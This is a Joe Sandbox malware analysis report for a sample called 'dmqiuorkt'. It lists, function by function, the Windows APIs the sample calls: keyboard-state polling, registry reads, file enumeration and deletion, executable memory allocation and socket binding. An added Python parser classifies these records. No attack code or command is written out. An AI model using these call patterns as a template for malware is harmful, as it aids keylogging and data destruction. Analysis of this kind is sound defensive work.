                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00890AA4,?,?,00000000,?,00890AA4,00000000,0000000C), ref: 00890757
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                            • Opcode ID: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                                                                                                                                            • Instruction ID: c558b3bea8c0507ba4ed757fb557e85dce290fb8377fc8477d9c23b62fcc0623
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b4632f91c8c463dd3bc050e38532b8c429adbaad06ca31efa9b6bf3df2c2cc6
                                                                                                                                                                            • Instruction Fuzzy Hash: 05D06C3200024DBFDF028F84DD46EDA3BAAFB48714F014000BE1856020C732E821AB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,008BD755), ref: 008BE9C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                                                                                                                                            • Instruction ID: e9975e2cda599303618509b453bb1f25ac1bc1c65b3bc38091be839f80f2fd97
                                                                                                                                                                            • Opcode Fuzzy Hash: 34f63a967fff82d02191510ed4a458e9eea25320dd4adc79162ad553059657d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 60B0922400061009BD780A3C1A480E92B01B8433A67D85B95E4F9D92E3C339980FE610
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008BDB69: FindFirstFileW.KERNELBASE(?,?), ref: 008BDBE0
                                                                                                                                                                              • Part of subcall function 008BDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 008BDC30
                                                                                                                                                                              • Part of subcall function 008BDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDC41
                                                                                                                                                                              • Part of subcall function 008BDB69: FindClose.KERNEL32(00000000), ref: 008BDC58
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008C6583
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
APIs
• CloseHandle.KERNELBASE(?,?,00000000,00893A1C), ref: 00857973
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01195000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01142000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 010FC000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 0118A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,01194D7B), ref: 01195137
Memory Dump Source
• Source File: 00000007.00000003.1601920919.0000000001195000.00000004.00000020.00020000.00000000.sdmp, Offset: 01193000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_1195000_dmqiuorkt.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 008CA11B
• FindNextFileW.KERNEL32(00000000,?), ref: 008CA176
• FindClose.KERNEL32(00000000), ref: 008CA181
• FindFirstFileW.KERNEL32(*.*,?), ref: 008CA19D
• SetCurrentDirectoryW.KERNEL32(?), ref: 008CA1ED
• SetCurrentDirectoryW.KERNEL32(00917B94), ref: 008CA20B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 008CA215
• FindClose.KERNEL32(00000000), ref: 008CA222
• FindClose.KERNEL32(00000000), ref: 008CA232
  • Part of subcall function 008BE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008BE2C9
Strings
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
                                                                                                                                                                            • Opcode ID: 35f7d83c582c8089f3cff4671ab512aa460d0318c2dc119b926313ee2baff563
                                                                                                                                                                            • Instruction ID: 25a673ab282eafefcfdffc214016741adf3a79cdc7d554010adb41eb14b4aca4
                                                                                                                                                                            • Opcode Fuzzy Hash: 35f7d83c582c8089f3cff4671ab512aa460d0318c2dc119b926313ee2baff563
                                                                                                                                                                            • Instruction Fuzzy Hash: 0631F37160431E6ACB14ABA4EC48EEE73BCFF05328F104159E815E6190EB76DA89CA51
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD350
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3C7
                                                                                                                                                                              • Part of subcall function 008DD2F7: _wcslen.LIBCMT ref: 008DD3FD
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC89D
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 008DC908
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DC92C
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008DC98B
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008DCA46
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCAB3
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCB48
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 008DCB99
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 008DCC42
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 008DCCE1
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008DCCEE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                            • Opcode ID: f755f308326c6882948fc00e7431ef6c3ec02a3740a9a9050e39e5b622f52202
                                                                                                                                                                            • Instruction ID: 98c12ba2146b9c0a22bcb6edca2eaa645adc1c2bd81b809a4c20ed6af663a6eb
                                                                                                                                                                            • Opcode Fuzzy Hash: f755f308326c6882948fc00e7431ef6c3ec02a3740a9a9050e39e5b622f52202
                                                                                                                                                                            • Instruction Fuzzy Hash: E1024E716042419FC714DF28C495E2ABBE5FF48318F18859EE94ACB3A2DB31ED46CB52
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 008BA572
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 008BA5F3
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 008BA60E
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 008BA628
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 008BA63D
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 008BA655
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 008BA667
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 008BA67F
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 008BA691
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 008BA6A9
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 008BA6BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                                                                                                                                            • Instruction ID: 78e63cadf83739a46397b9262a8349cac2833e64f438e45822d38c5287938973
                                                                                                                                                                            • Opcode Fuzzy Hash: 62e4a494836a92e35be211e7375908b2e33707ff47c1115a47d3291b9087c0d8
                                                                                                                                                                            • Instruction Fuzzy Hash: 084195A45087C96EFF394B6088143E5BFA0FB22344F088059D5C6DA3C1EB94DED88B53
                                                                                                                                                                            APIs
                                                                                                                                                                            • CoInitialize.OLE32 ref: 008D40D1
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 008D40DC
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,008F0B44,?), ref: 008D4136
                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 008D41A9
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 008D4241
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 008D4293
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                            • Opcode ID: 783238289f213b83a79ef208e29eee93f60a7144d94941e1d73517712b86dc6c
                                                                                                                                                                            • Instruction ID: ad8703510fc80ed3b7a2d50700a90012117ec3b362d00d3197865985369f1b8f
                                                                                                                                                                            • Opcode Fuzzy Hash: 783238289f213b83a79ef208e29eee93f60a7144d94941e1d73517712b86dc6c
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B6159712043019FC711DF64D889BAABBE4FF89754F100A1AF985DB391DB70E988CB92
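                                                                                                                                                                             The three records above (registry value queries through RegConnectRegistryW, RegOpenKeyExW and RegQueryValueExW; modifier-key polling through GetKeyboardState, GetAsyncKeyState and GetKeyState; and COM object creation through CoInitialize, CoCreateInstance and IIDFromString) are presented only as raw API lists. The Python below is an added triage helper, not part of the Joe Sandbox report or of its IDA plugin. It parses lines in this report's "• API.MODULE(args), ref: ADDR" shape, decodes the constants the report prints as 8-digit hex (the virtual-key codes 000000A0, 000000A1, 00000011, 00000012 and 0000005B, and the CoCreateInstance dwClsContext value 00000017), and tags each record with a coarse behaviour label. The excerpt it parses is constructed from the records on this page; the behaviour tags are the example's own heuristics and state only which APIs a record lists, not what the sample does with their results.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# Constructed excerpt: copied from the function records on this page, indentation trimmed.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 008BA572
• GetAsyncKeyState.USER32(000000A0), ref: 008BA5F3
• GetKeyState.USER32(000000A0), ref: 008BA60E
• GetAsyncKeyState.USER32(000000A1), ref: 008BA628
• GetAsyncKeyState.USER32(00000011), ref: 008BA655
• GetAsyncKeyState.USER32(00000012), ref: 008BA67F
• GetAsyncKeyState.USER32(0000005B), ref: 008BA6A9
APIs
• CoInitialize.OLE32 ref: 008D40D1
• CoCreateInstance.OLE32(?,00000000,00000017,008F0B44,?), ref: 008D4136
• IIDFromString.OLE32(?,?), ref: 008D41A9
APIs
  • Part of subcall function 008DD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008DC00D,?,?), ref: 008DD314
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008DC89D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 008DC908
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 008DC98B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008DCA46
• RegCloseKey.ADVAPI32(00000000), ref: 008DCCEE
"""

# One report line: optional "Part of subcall function XXXX:" prefix, API.MODULE, optional
# parenthesised argument list, then "ref: ADDR" (CoInitialize.OLE32 has no parens at all).
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall: bool = False


@dataclass
class Record:
    calls: list = field(default_factory=list)


def parse_records(text):
    """Split the listing at each 'APIs' header and parse the bullet lines under it."""
    records = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(Record())
            continue
        m = CALL_RE.match(line)
        if not m or not records:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        records[-1].calls.append(
            Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] is not None))
    return records


def arg_int(arg):
    """The report prints resolved constants as 8-digit hex and unresolved ones as '?'."""
    return None if arg == "?" else int(arg, 16)


# Virtual-key codes seen in the record above (winuser.h values).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


def polled_keys(record):
    """Virtual keys passed to GetAsyncKeyState/GetKeyState, in call order, deduplicated."""
    seen = []
    for c in record.calls:
        if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args:
            code = arg_int(c.args[0])
            name = "?" if code is None else VK_NAMES.get(code, "VK_%02X" % code)
            if name not in seen:
                seen.append(name)
    return seen


# CLSCTX bits (combase.h); 0x17 is the union of all four.
CLSCTX = [(0x1, "CLSCTX_INPROC_SERVER"), (0x2, "CLSCTX_INPROC_HANDLER"),
          (0x4, "CLSCTX_LOCAL_SERVER"), (0x10, "CLSCTX_REMOTE_SERVER")]


def clsctx_flags(value):
    return [name for bit, name in CLSCTX if value & bit]


def classify(record):
    """Coarse tag derived only from the APIs the record lists; subcall entries are ignored."""
    apis = {c.api for c in record.calls if not c.subcall}
    if apis & {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"}:
        return "keyboard-state polling (%s)" % ", ".join(polled_keys(record))
    if "CoCreateInstance" in apis:
        ctx = next(c for c in record.calls if c.api == "CoCreateInstance")
        return "COM object creation (%s)" % "|".join(clsctx_flags(arg_int(ctx.args[2])))
    if "RegQueryValueExW" in apis:
        n = sum(1 for c in record.calls if c.api == "RegQueryValueExW")
        remote = ", via RegConnectRegistryW" if "RegConnectRegistryW" in apis else ""
        return "registry read (%d value queries%s)" % (n, remote)
    if "FindFirstFileW" in apis:
        return "directory enumeration"
    return "unclassified"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print("%08X  %s" % (rec.calls[0].ref, classify(rec)))
```

                                                                                                                                                                             Run against the full report text, the same parser covers every "APIs" block on the page; the subcall entries (indented "Part of subcall function" lines) are kept on the record but excluded from classification so that a helper's CharUpperBuffW does not colour the caller's tag. RegConnectRegistryW is flagged separately because it accepts a remote machine name, which is worth a second look even though the report leaves that argument unresolved ("?").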
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008CA4D5
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008CA5E8
                                                                                                                                                                              • Part of subcall function 008C41CE: GetInputState.USER32 ref: 008C4225
                                                                                                                                                                              • Part of subcall function 008C41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008C42C0
                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008CA505
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008CA5D2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                            • Opcode ID: 68d6c948fd1ce911100aac604d984ed1f41110514d7fa11c0143bc7dc96cff7e
                                                                                                                                                                            • Instruction ID: 5f09169f1bf1c5f8b67ea7c4fff7023e62e19758ecdbdadfaff5cce2778adc2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 68d6c948fd1ce911100aac604d984ed1f41110514d7fa11c0143bc7dc96cff7e
                                                                                                                                                                            • Instruction Fuzzy Hash: CF415D7190020E9BCF14DFA4C849EEEBBB4FF15319F24805AE805E6191E775DE88CB52
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 008522EE
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 008523C3
                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 008523D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                            • Opcode ID: ae1ac3f06bb8e2120d411b504b3eec89b79aa9d4d6b0d44560ebfa89301a19ce
                                                                                                                                                                            • Instruction ID: 3251724723e95d4f177139ed87c2fca80a501c4ef7bdd95aa478be0cdcc75ebc
                                                                                                                                                                            • Opcode Fuzzy Hash: ae1ac3f06bb8e2120d411b504b3eec89b79aa9d4d6b0d44560ebfa89301a19ce
                                                                                                                                                                            • Instruction Fuzzy Hash: E5813AF0204058BEEA39763D8C99EBF254DFB4330AF180129F942D96A5CE598F09D236
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008D39AB: inet_addr.WSOCK32(?), ref: 008D39D7
                                                                                                                                                                              • Part of subcall function 008D39AB: _wcslen.LIBCMT ref: 008D39F8
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 008D21BA
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D21E1
                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 008D2238
                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 008D2243
                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 008D2272
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                            • Opcode ID: 76aac888592c1423308b0f6a13781067eacc653d6e79aeac7b11877d0e472f04
                                                                                                                                                                            • Instruction ID: 116d68a61032cd27b9ffb4ff467ba5d40313694ff46849eefd276dcc45ec8bcf
                                                                                                                                                                            • Opcode Fuzzy Hash: 76aac888592c1423308b0f6a13781067eacc653d6e79aeac7b11877d0e472f04
